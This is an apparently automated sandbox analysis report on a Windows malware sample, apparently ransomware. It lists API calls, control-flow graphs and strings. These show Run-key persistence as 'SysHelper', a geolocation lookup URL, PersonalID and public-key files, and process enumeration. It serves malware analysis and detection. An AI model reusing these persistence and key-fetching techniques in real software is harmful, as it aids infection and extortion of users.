                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                • CloseHandle.KERNEL32(00000000), ref: 00412347
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                • API String ID: 3668891214-3807497772
                • Opcode ID: 45653c60598680e3d69244e1024ec46be28009d54c4cdfb4752acc6fb51945e7
                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                • Opcode Fuzzy Hash: 45653c60598680e3d69244e1024ec46be28009d54c4cdfb4752acc6fb51945e7
                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                APIs
                • timeGetTime.WINMM ref: 0041F15E
                • Sleep.KERNEL32(?), ref: 0041F185
                • Sleep.KERNEL32(?), ref: 0041F19D
                • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0
                  • Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
                  • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                  • Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                  • Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
                  • Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                • String ID: C:\
                • API String ID: 3672571082-3404278061
                • Opcode ID: 02cbcc9ea24c62c3d3e76ae209afd0461053dbc8594d83a6df7828dd56d73afa
                • Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
                • Opcode Fuzzy Hash: 02cbcc9ea24c62c3d3e76ae209afd0461053dbc8594d83a6df7828dd56d73afa
                • Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1829 41bae0-41bb0d 1830 41bba0-41bba7 1829->1830 1831 41bb13 1829->1831 1832 41bf3d-41bf47 1830->1832 1833 41bbad-41bbae 1830->1833 1834 41bb15-41bb1a 1831->1834 1835 41bb54-41bb5e 1831->1835 1836 41bf49 1832->1836 1837 41bf5c-41bf63 1832->1837 1840 41bbb0-41bbd4 DefWindowProcW 1833->1840 1841 41bbd7-41bc45 call 420c62 GetComputerNameW call 413100 call 41ce80 1833->1841 1842 41bb47-41bb4f PostQuitMessage 1834->1842 1843 41bb1c-41bb1f 1834->1843 1838 41bf81-41bf97 1835->1838 1839 41bb64-41bb68 1835->1839 1844 41bf50-41bf54 1836->1844 1845 41bf65-41bf71 IsWindow 1837->1845 1846 41bf9a-41bfc2 DefWindowProcW 1837->1846 1847 41bb75-41bb9d DefWindowProcW 1839->1847 1848 41bb6a-41bb6e 1839->1848 1863 41bc47-41bc4c 1841->1863 1864 41bc7b-41bc80 1841->1864 1842->1838 1843->1838 1850 41bb25-41bb28 1843->1850 1844->1846 1851 41bf56-41bf5a 1844->1851 1845->1838 1852 41bf73-41bf7b DestroyWindow 1845->1852 1848->1839 1853 41bb70 1848->1853 1850->1840 1855 41bb2e-41bb31 1850->1855 1851->1837 1851->1844 1852->1838 1853->1838 1855->1838 1857 41bb37-41bb42 call 411cd0 1855->1857 1857->1845 1865 41bc5a-41bc76 call 4145a0 1863->1865 1866 41bc4e-41bc57 call 422587 1863->1866 1867 41bc82-41bc8b call 422587 1864->1867 1868 41bc8e-41bcb1 1864->1868 1865->1864 1866->1865 1867->1868 1872 41bcb3-41bcbc call 422587 1868->1872 1873 41bcbf-41bcf1 call 420bed 1868->1873 1872->1873 1880 41bcf7-41bcfa 1873->1880 1881 41befb-41bf0f IsWindow 1873->1881 1882 41bd00-41bd04 1880->1882 1883 41bf11-41bf18 1881->1883 1884 41bf28-41bf2d 1881->1884 1885 41bee5-41bef1 1882->1885 1886 41bd0a-41bd0e 1882->1886 1883->1884 1887 41bf1a-41bf22 DestroyWindow 1883->1887 1884->1838 1888 41bf2f-41bf3b call 422587 1884->1888 1885->1882 1890 41bef7-41bef9 1885->1890 1886->1885 1889 41bd14-41bd7b call 414690 * 2 call 40eff0 1886->1889 1887->1884 1888->1838 1899 41bee1 1889->1899 1900 41bd81-41be44 call 41c330 call 419d10 call 41c240 call 41b680 call 41b8b0 call 414690 call 41ce80 call 4131d0 1889->1900 1890->1881 1890->1884 1899->1885 1917 41be55-41be81 1900->1917 1918 41be46-41be52 call 422587 1900->1918 1919 41be83-41be8c call 422587 1917->1919 1920 41be8f-41bedf CreateThread 1917->1920 1918->1917 1919->1920 1920->1885
                APIs
                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                • _malloc.LIBCMT ref: 0041BBE4
                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                • _free.LIBCMT ref: 0041BCD7
                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                • IsWindow.USER32(?), ref: 0041BF69
                • DestroyWindow.USER32(?), ref: 0041BF7B
                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                • String ID:
                • API String ID: 3873257347-0
                • Opcode ID: c95607aa65a1ad0a0c47567cd91cce6e3f94310549618cb0ce4eeda373aa7939
                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                • Opcode Fuzzy Hash: c95607aa65a1ad0a0c47567cd91cce6e3f94310549618cb0ce4eeda373aa7939
                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1925 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 1932 40cfb2-40cfb4 1925->1932 1933 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 1925->1933 1934 40d213-40d217 1932->1934 1936 40d000-40d01d 1933->1936 1937 40d224-40d236 1934->1937 1938 40d219-40d221 call 422587 1934->1938 1939 40d023-40d02c 1936->1939 1940 40d01f-40d021 1936->1940 1938->1937 1943 40d030-40d035 1939->1943 1942 40d039-40d069 call 4156d0 call 414300 1940->1942 1950 40d1cb 1942->1950 1951 40d06f-40d08b call 413010 1942->1951 1943->1943 1945 40d037 1943->1945 1945->1942 1952 40d1cd-40d1d1 1950->1952 1957 40d0b9-40d0bd 1951->1957 1958 40d08d-40d091 1951->1958 1954 40d1d3-40d1db call 422587 1952->1954 1955 40d1de-40d1f4 1952->1955 1954->1955 1960 40d201-40d20f 1955->1960 1961 40d1f6-40d1fe call 422587 1955->1961 1965 40d0cd-40d0e1 call 414300 1957->1965 1966 40d0bf-40d0ca call 422587 1957->1966 1962 40d093-40d09b call 422587 1958->1962 1963 40d09e-40d0b4 call 413d40 1958->1963 1960->1934 1961->1960 1962->1963 1963->1957 1965->1950 1976 40d0e7-40d149 call 413010 1965->1976 1966->1965 1979 40d150-40d15a 1976->1979 1980 40d160-40d162 1979->1980 1981 40d15c-40d15e 1979->1981 1983 40d165-40d16a 1980->1983 1982 40d16e-40d18b call 40b650 1981->1982 1987 40d19a-40d19e 1982->1987 1988 40d18d-40d18f 1982->1988 1983->1983 1984 40d16c 1983->1984 1984->1982 1987->1979 1990 40d1a0 1987->1990 1988->1987 1989 40d191-40d198 1988->1989 1989->1987 1991 40d1c7-40d1c9 1989->1991 1992 40d1a2-40d1a6 1990->1992 1991->1992 1993 40d1b3-40d1c5 1992->1993 1994 40d1a8-40d1b0 call 422587 1992->1994 1993->1952 1994->1993
                APIs
                • _memset.LIBCMT ref: 0040CF4A
                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                Strings
                • "country_code":", xrefs: 0040CFE1
                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                • Microsoft Internet Explorer, xrefs: 0040CF5A
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead_memset
                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                • API String ID: 1485416377-2962370585
                • Opcode ID: 61ae16a5be6c75bfa23cdeafeaebca6e4cfccb4efbfb813c7956fe22a537a39a
                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                • Opcode Fuzzy Hash: 61ae16a5be6c75bfa23cdeafeaebca6e4cfccb4efbfb813c7956fe22a537a39a
                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2147 40c740-40c792 call 420fdd 2150 40c911-40c915 2147->2150 2151 40c798-40c7a3 call 420546 2147->2151 2152 40c944-40c968 CreateDirectoryW call 420fdd 2150->2152 2153 40c917 2150->2153 2159 40c906-40c90e call 423a38 2151->2159 2160 40c7a9 2151->2160 2164 40c96a-40c96c 2152->2164 2165 40c9af-40c9b3 2152->2165 2155 40c920-40c93b call 414c60 2153->2155 2155->2164 2169 40c93d-40c942 2155->2169 2159->2150 2163 40c7b0-40c7bc call 421101 2160->2163 2175 40c7c1-40c7c6 2163->2175 2171 40c972-40c976 2164->2171 2172 40ca43-40ca47 2164->2172 2167 40c9b5 2165->2167 2168 40c9d8-40ca03 call 4228fd * 2 call 423a38 2165->2168 2174 40c9b8-40c9bc 2167->2174 2168->2172 2213 40ca05-40ca09 2168->2213 2169->2152 2169->2155 2176 40ca3a-40ca40 call 422587 2171->2176 2177 40c97c 2171->2177 2179 40ca54-40ca64 2172->2179 2180 40ca49-40ca51 call 422587 2172->2180 2181 40c9c2 2174->2181 2182 40c9be-40c9c0 2174->2182 2183 40c8f3-40c900 call 420546 2175->2183 2184 40c7cc-40c7e7 2175->2184 2176->2172 2186 40c980-40c984 2177->2186 2180->2179 2189 40c9c4-40c9d3 call 4228fd 2181->2189 2182->2189 2183->2159 2183->2163 2190 40c7e9-40c7eb 2184->2190 2191 40c7ed-40c7f3 2184->2191 2194 40c990-40c9a8 2186->2194 2195 40c986-40c98d call 422587 2186->2195 2189->2174 2211 40c9d5 2189->2211 2200 40c805-40c81e call 415c10 2190->2200 2201 40c7f6-40c7ff 2191->2201 2194->2186 2198 40c9aa 2194->2198 2195->2194 2198->2176 2214 40c820-40c822 2200->2214 2215 40c861-40c863 2200->2215 2201->2201 2206 40c801-40c803 2201->2206 2206->2200 2211->2168 2213->2176 2217 40ca0b 2213->2217 2214->2215 2216 40c824-40c83c 2214->2216 2218 40c874-40c876 2215->2218 2219 40c865-40c871 call 414f70 2215->2219 2220 40c84d-40c855 2216->2220 2221 40c83e-40c84a call 414f70 2216->2221 2222 40ca10-40ca14 2217->2222 2224 40c8d5-40c8e3 2218->2224 2225 40c878-40c88f 2218->2225 2219->2218 2220->2224 2229 40c857-40c85f call 413160 2220->2229 2221->2220 2227 40ca20-40ca38 2222->2227 2228 40ca16-40ca1d call 422587 2222->2228 2230 40c8f0 2224->2230 2231 40c8e5-40c8ed call 422587 2224->2231 2233 40c891-40c895 2225->2233 2234 40c8a9-40c8ae 2225->2234 2227->2176 2227->2222 2228->2227 2229->2224 2230->2183 2231->2230 2236 40c8b5-40c8d1 2233->2236 2240 40c897-40c8a7 call 4205a0 2233->2240 2234->2236 2236->2224 2240->2236
                APIs
                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                • _fgetws.LIBCMT ref: 0040C7BC
                • _memmove.LIBCMT ref: 0040C89F
                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2864494435-54166481
                • Opcode ID: a48f2902b6917900b3f30e831e771307a42463aeb79284a06921e56d4381bb6a
                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                • Opcode Fuzzy Hash: a48f2902b6917900b3f30e831e771307a42463aeb79284a06921e56d4381bb6a
                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2246 40c6a0-40c6ca RegOpenKeyExW 2247 40c734-40c739 2246->2247 2248 40c6cc-40c6fb RegQueryValueExW 2246->2248 2249 40c70c-40c72e RegSetValueExW RegCloseKey 2248->2249 2250 40c6fd-40c70b RegCloseKey 2248->2250 2249->2247
                APIs
                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CloseValue$OpenQuery
                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                • API String ID: 3962714758-1667468722
                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2251 41e6e8-41e6ef 2252 41e6f0-41e722 call 42b420 call 40c500 2251->2252 2257 41e724-41e729 2252->2257 2258 41e72e-41e772 InternetOpenW 2252->2258 2261 41ea1f-41ea40 call 423cf0 2257->2261 2259 41e774-41e776 2258->2259 2260 41e778-41e77d 2258->2260 2262 41e78f-41e7b8 call 415ae0 call 421c02 2259->2262 2263 41e780-41e789 2260->2263 2268 41ea42-41ea46 2261->2268 2269 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 2261->2269 2284 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 2262->2284 2285 41e7be-41e7f7 call 414690 call 40dd40 2262->2285 2263->2263 2265 41e78b-41e78d 2263->2265 2265->2262 2271 41ee2a-41ee3a call 411b10 2268->2271 2272 41ea4c-41ea61 SHGetFolderPathA 2268->2272 2273 41eaef-41eb12 2269->2273 2274 41eace 2269->2274 2292 41ee4d-41ee82 call 40ef50 2271->2292 2293 41ee3c-41ee3f 2271->2293 2272->2252 2276 41ea67-41ea88 PathAppendA DeleteFileA 2272->2276 2280 41eb14-41eb16 2273->2280 2281 41eb18-41eb1f 2273->2281 2277 41ead0-41ead8 2274->2277 2276->2252 2282 41eaeb 2277->2282 2283 41eada-41eae7 lstrlenA 2277->2283 2287 41eb2b-41eb4f call 4156d0 call 412900 2280->2287 2288 41eb22-41eb27 2281->2288 2282->2273 2283->2277 2290 41eae9 2283->2290 2342 41e8f3-41e917 lstrcpyW 2284->2342 2343 41e8e7-41e8f0 call 422587 2284->2343 2314 41e7f9-41e7fe 2285->2314 2315 41e86f-41e874 2285->2315 2312 41eb51 2287->2312 2313 41eb53-41eb66 lstrcpyW 2287->2313 2288->2288 2295 41eb29 2288->2295 2290->2273 2305 41ee86-41ee8c 2292->2305 2300 41e6e0-41e6e6 2293->2300 2295->2287 2300->2252 2309 41ee92-41ee94 2305->2309 2310 41ee8e-41ee90 2305->2310 2320 41ee97-41ee9c 2309->2320 2318 41eea0-41eeaf call 413ea0 2310->2318 2312->2313 2321 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 2313->2321 2322 41eb68-41eb71 call 422587 2313->2322 2316 41e800-41e809 call 422587 2314->2316 2317 41e80c-41e827 2314->2317 2315->2284 2323 41e876-41e87f call 422587 2315->2323 2316->2317 2325 41e842-41e848 2317->2325 2326 41e829-41e82d 2317->2326 2318->2305 2344 41eeb1-41eee3 call 40ef50 2318->2344 2320->2320 2328 41ee9e 2320->2328 2365 41ebe6-41ebea 2321->2365 2366 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 2321->2366 2322->2321 2323->2284 2335 41e84e-41e86c 2325->2335 2334 41e82f-41e840 call 4205a0 2326->2334 2326->2335 2328->2318 2334->2335 2335->2315 2348 41e943-41e97a InternetOpenUrlW InternetReadFile 2342->2348 2349 41e919-41e920 2342->2349 2343->2342 2364 41eee7-41eeed 2344->2364 2352 41e9ec-41ea08 InternetCloseHandle * 2 2348->2352 2353 41e97c-41e994 SHGetFolderPathA 2348->2353 2349->2348 2355 41e922-41e92e 2349->2355 2360 41ea16-41ea19 2352->2360 2361 41ea0a-41ea13 call 422587 2352->2361 2353->2352 2359 41e996-41e9c2 PathAppendA call 4220b6 2353->2359 2362 41e930-41e935 2355->2362 2363 41e937 2355->2363 2359->2352 2382 41e9c4-41e9e9 lstrlenA call 422b02 call 423a38 2359->2382 2360->2261 2361->2360 2369 41e93c-41e93d lstrcatW 2362->2369 2363->2369 2370 41eef3-41eef5 2364->2370 2371 41eeef-41eef1 2364->2371 2365->2271 2373 41ebf0-41ec11 SHGetFolderPathA 2365->2373 2375 41ec99 2366->2375 2376 41ecbf-41ecdd 2366->2376 2369->2348 2372 41eef8-41eefd 2370->2372 2378 41ef01-41ef10 call 413ea0 2371->2378 2372->2372 2379 41eeff 2372->2379 2373->2252 2380 41ec17-41ec38 PathAppendA DeleteFileA 2373->2380 2383 41eca0-41eca8 2375->2383 2384 41ece3-41eced 2376->2384 2385 41ecdf-41ece1 2376->2385 2378->2364 2393 41ef12-41ef4c call 413ff0 call 412900 2378->2393 2379->2378 2380->2300 2382->2352 2388 41ecbb 2383->2388 2389 41ecaa-41ecb7 lstrlenA 2383->2389 2391 41ecf0-41ecf5 2384->2391 2390 41ecf9-41ed1b call 4156d0 call 412900 2385->2390 2388->2376 2389->2383 2395 41ecb9 2389->2395 2405 41ed1d 2390->2405 2406 41ed1f-41ed35 lstrcpyW 2390->2406 2391->2391 2396 41ecf7 2391->2396 2410 41ef50-41ef68 lstrcpyW 2393->2410 2411 41ef4e 2393->2411 2395->2376 2396->2390 2405->2406 2408 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 2406->2408 2409 41ed37-41ed40 call 422587 2406->2409 2426 41edad-41edb6 lstrlenW 2408->2426 2427 41edbc-41edc1 2408->2427 2409->2408 2414 41ef76-41efb3 call 413ff0 call 412900 2410->2414 2415 41ef6a-41ef73 call 422587 2410->2415 2411->2410 2430 41efb5 2414->2430 2431 41efb7-41efc6 lstrcpyW 2414->2431 2415->2414 2426->2427 2432 41ee44-41ee48 2426->2432 2428 41ee10-41ee12 2427->2428 2429 41edc3-41ede4 SHGetFolderPathA 2427->2429 2434 41ee14-41ee1a call 420bed 2428->2434 2435 41ee1d-41ee1f 2428->2435 2429->2252 2433 41edea-41ee0b PathAppendA DeleteFileA 2429->2433 2430->2431 2436 41efd4-41efe0 2431->2436 2437 41efc8-41efd1 call 422587 2431->2437 2438 41f01a-41f030 2432->2438 2433->2300 2434->2435 2435->2271 2440 41ee21-41ee27 call 420bed 2435->2440 2442 41efe2-41efeb call 422587 2436->2442 2443 41efee-41f008 2436->2443 2437->2436 2440->2271 2442->2443 2448 41f016 2443->2448 2449 41f00a-41f013 call 422587 2443->2449 2448->2438 2449->2448
                APIs
                • _memset.LIBCMT ref: 0041E707
                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                • InternetOpenW.WININET ref: 0041E743
                • _wcsstr.LIBCMT ref: 0041E7AE
                • _memmove.LIBCMT ref: 0041E838
                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                • _strstr.LIBCMT ref: 0041EA36
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                • DeleteFileA.KERNEL32(?), ref: 0041EA82
                • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                • lstrlenA.KERNEL32(?), ref: 0041EAC8
                • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                • lstrlenA.KERNEL32(?), ref: 0041EB7C
                • _malloc.LIBCMT ref: 0041EB86
                • _memset.LIBCMT ref: 0041EB94
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                • _strstr.LIBCMT ref: 0041EBDA
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                • DeleteFileA.KERNEL32(?), ref: 0041EC32
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                • String ID: bowsakkdestx.txt${"public_key":"
                • API String ID: 2805819797-1771568745
                • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000C.00000002.2488460103.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 0000000C.00000002.2488460103.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_12_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
